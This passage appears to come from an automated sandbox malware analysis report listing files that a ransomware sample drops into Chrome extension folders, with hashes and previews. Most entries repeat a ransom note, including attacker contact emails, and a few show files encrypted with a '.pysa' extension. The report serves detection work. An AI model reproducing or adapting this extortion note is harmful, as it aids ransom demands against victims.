                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ur\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\zu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):69632
                  Entropy (8bit):7.989114112091309
                  Encrypted:false
                  SSDEEP:1536:HQ4el5udAZjHNvJeJC+tQvgDe1/eseSgFEdv7fXPFoI:1elkdeyGvgDelYSgFUv7ftt
                  MD5:5530D73E6845068083FCCE71E3D1D4C6
                  SHA1:6EEBD5797C37C8252A3FED590A31723B3AC266B2
                  SHA-256:1B214889C3EFA74BF0BA66AF6A1DFFFC3C79B786A7E253F08E4CA78F356078F3
                  SHA-512:7AEA7C9C7429C7E983DA5DBE739B9EB97B577A218009F159985763910170EB426FD9CF85198E2E34836F523A4486DDB7FE398281B8AAE7CBF3FC12B7C4018EDF
                  Malicious:false
                  Preview: .6.....x".p-p'.!.Q.......y.Q1..o,.....O.x._.B..-.u&2..;e<;...*uN....3O...3.....V..q....f....<B...?..g.I....x.k..}.*....`R..5tB.E......./...W.oO."..J./..;..._O.x/.R.;j....EhT.;...g.!...K..N......^w...K.....U....3P...Z.".e.<........0...z.....k.1....e..?Ln.}..x..KbB.b.$>.....T...zN|.(:{.}.FD w..;v}.nx.o..Vvv......Sq....y....[......s... )....x.\Ri..7Y..YiX..$?t$+.4.$y.8{.9..+..8.+..4. ...>.....x.#c..`...R....*D.#..7.g.....i^....b.\..i<1....:X.<9......Z.....)0.).29.d....p....r}:lt...`.-y..87..4.3!StY'.o..pg.......v1.l...p$55(..Z.!..].K..I...k...zR...k..b..E..&.g.:.9..........H.v..O.w35t...L...]..Re.x:.Zt..[}...}.....YA...BP....#,Vv9.[...j..2?.:..m..E..v.*W..P.3E...6p.......A.?.%.z>.......%.x.!....{.Dj...c._.....{~.8.`6....j...r.......;.......I..[8M/G.`x.....f.f..7..f.C...'....u....{.&IG...?a+].w...x..\.(..`...]........Ja:c..3.=..0..4.....8.....w.j.....F..d...,.......Y...S.1(!F~.i..Q.i...B)J.9wARVk..S.Y.x..6..........;.Sz..8Z.c.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\manifest.json.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.049426286448229
                  Encrypted:false
                  SSDEEP:48:0OOSOfevf8+q9nZ0ctVmrsm9i2o27nR7o2E0JcZ1xaXMsgePbLfRYmeaR7:0OO80R9nZYDi2rRGYcZKcWPHfheaR7
                  MD5:8895CF5D4A68F81ECC5D297AEA4D63B9
                  SHA1:470419623DC93A996989135544ED9063CC6B0925
                  SHA-256:BBC78EB2F8524F97387B9CB7DB2252792726360C7C33FF6C79D8221CE25E3252
                  SHA-512:7867FE0C200684B6EB9A7603EE350B8060D719EAEF8F5C99F2A3E364B65F03A09BF7B0C443744387FF1087FC36578867A799139F6451878320734C7D494FF7AF
                  Malicious:false
                  Preview: ......RZh.......w....|..G[OA.l.....#(.2..3...>&..U....B..dY.'.|.cP.?Z.Z.v....~.....!1.S....JM..Y.5..H...:h.....e....=C:..A.w.^..H........bi.......ze@..../.|..B..f...E,...K...x..".k..6....x..U.vO.f.C.-E<i..x..v.CZ_...}r....xT...b..;.I.d..#.q..Vc.@..._We.|X.A.?.;.j..!.O..c....*...W.RP...g$*..I..]....8.......u.E..d^nQ.O..s.p...\1.7.Jmkq...ai...7T._r.........!.4......].....F2 .d.1{N....X......,.z~&.&p Z../..+.6#Peu.dX..M...a.....}.].<a...%.h4.:...$.aP.K,.....`v.G..e.......P.5.,.1..<w]...Me..+..?.S:1*.:...q...Y..OM#I.."..).A../:.Dj..!...3.....5..Q.....v...@9+>V*.R.\..(..h..W..*...........*...*..%H.1.Hv.:.....3....H6..=I..I...k[.."#..<..~g.t.....H.u.(.7&MDr....n.Nl...U..a..O....U&..Vnk..F.E.Z.q.~...Yy.E]..}...us...&{ ..%2.33jk...}....A..t....$..B.6.............*pc5..>J.......H...;l+mnXp.\M#;W.D..%.1...,A|../.C. c..^.1...;"}..fyR...Q..|..0.5...C.iP.8.....f.....^R6..;xj.p....1#b....T;y..W.O..AV.....W..K.F..GF..f..h....W..R.l5.c..Bsc.p.."[v..8Cy.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\en\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
